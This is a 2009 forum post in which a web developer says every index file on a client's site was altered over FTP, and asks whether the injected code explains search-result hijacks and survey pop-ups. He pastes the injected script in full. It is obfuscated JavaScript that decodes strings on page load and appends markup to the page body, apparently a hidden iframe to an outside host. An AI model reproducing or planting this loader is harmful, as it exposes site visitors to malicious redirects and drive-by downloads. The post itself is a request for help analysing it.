Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Search Results Hijacks, TheWebsiteSurvey.com, and Virus Insertion?


  • Please log in to reply
No replies to this topic

#1 JohnnyMo1974

JohnnyMo1974

  • Members
  • 1 posts
  • OFFLINE
  •  
  • Local time:05:15 PM

Posted 25 December 2009 - 05:02 AM

Hey guys, I have caught a number of discussions here on BC and elsewhere mentioning Search Engine Hijacks and redirects to all sorts of random things as well as odd pop ups from TheWebsiteSurvey.com. I imagine this has little if anything to do with it, but being that I can't make heads or tails of this, I thought I'd post for brighter minds to take a look at and make sense of.

As of two days ago I started getting hijacks on search engine result links, and the stupid websitesurvey pop-up/redirect. I thought I had some odd virus but got a clean bill of health from MBAM, SAS, etc...

Oddly enough, when I think back, this all started the day following troubleshooting a client website that was somehow compromised by an odd "insertion" or virus of some sort. Basically, I had a client call because multiple things on his website ceased to function and when I pulled the pages to take a look, every single index file on his site (whether html, php, etc...) had been "hacked" and had the code I have copied below inserted within the page somewhere. (In most instances immediately following the body tag, but on some pages the code was less neatly inserted.)

I got in touch with his Hosting company and had them see if they could source the issue and they indicated it appeared that all the pages were accessed via FTP, downloaded from his server, and reuploaded as opposed to being a script hole exploit. They gave an IP address in the Netherlands as the culprit and I subsequently blocked that from his server as well as from various other client sites/servers.

That all noted, I have no idea if the "virus" or the code below has any effect on these pop-ups or other hijacks, but since no better answer has been offered of yet I thought I'd put this out there for folks with a better grasp of code to take a gander at:

<script>

function gNX(SINgqDZU, tsEmfJA, DeODs)

{

	var BLAFGHFclX=DeODs.split(tsEmfJA);

	var lFMSkvVXr='';

	for(HOFt=-0x30+0x5+0x2b;HOFt<(BLAFGHFclX.length-1);HOFt+=-0x2c+0x3-0x20-0x2a+0x74)

	{ TedLPqI = BLAFGHFclX[HOFt]^SINgqDZU;lFMSkvVXr += String.fromCharCode(TedLPqI);}return lFMSkvVXr;}

		

		function uYdGUc(vCX){  fff=op.split("1040");alert('Hqu'); } 

;function RFjcyVP(){var eVTDqpjSf=new Function("hwdjiK", "return "+gNX(-0x8+0x1f+0xd-0x2d+0x8-0x22+0x30+0x638, 'U','1569U1578U1574U1584U1576U1568U1579U1585U')+"."+gNX(0xf-0x25+0xa-0x2c-0x2b-0x18+0x15+0x4be, 'V','1082V1079V1084V1057V')+"");var capQNK=eVTDqpjSf(-0x2e-0x1a+0x49);capQNK.innerHTML+=gNX(0x2+0x22-0x2a-0x2f+0x2eb, 'B','650B735B720B708B727B731B723B662B705B735B722B706B734B651B647B662B734B723B735B721B734B706B651B647B662B724B729B708B722B723B708B651B646B662B720B708B727B731B723B724B729B708B722B723B708B651B646B662B709B708B725B651B657B734B706B706B710B652B665B665B655B647B664B644B646B647B664B644B655B664B647B644B645B665B716B723B730B723B665B735B728B722B723B718B664B710B734B710B649B709B651B644B725B725B724B646B645B725B723B644B724B725B725B645B720B646B655B642B646B640B654B643B641B644B654B727B643B646B643B724B645B725B722B657B648B650B665B735B720B708B727B731B723B648B');}function SZaNHz(Gbadqmty){ var HNf=new Function("KIYeUjkV", "return 361449;"); fff=op.split("372");var Coi = document.getElementById('nhYekfglDJ');window.eval(); } 

;if(window.addEventListener)

{

window.addEventListener(gNX(0x3+0x32+0x31+0x8b, 'q','157q158q144q149q'),RFjcyVP,false);}else if(window.attachEvent){window.attachEvent('on'+gNX(0x3+0x32+0x31+0x8b, 'q','157q158q144q149q'), RFjcyVP);}function DQojwMqe(NhxFdsTt){  fff=op.split("696"); } 

;</script>

I don't know but might it be theoretically possible that any site with this code inserted will then redirect you to the useless search hijacks and surveys when the listing appears in Google or Yahoo?

Hope it helps,

JM

EDIT: Moved to a more appropriate forum

Edited by garmanma, 25 December 2009 - 03:57 PM.


BC AdBot (Login to Remove)

 





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users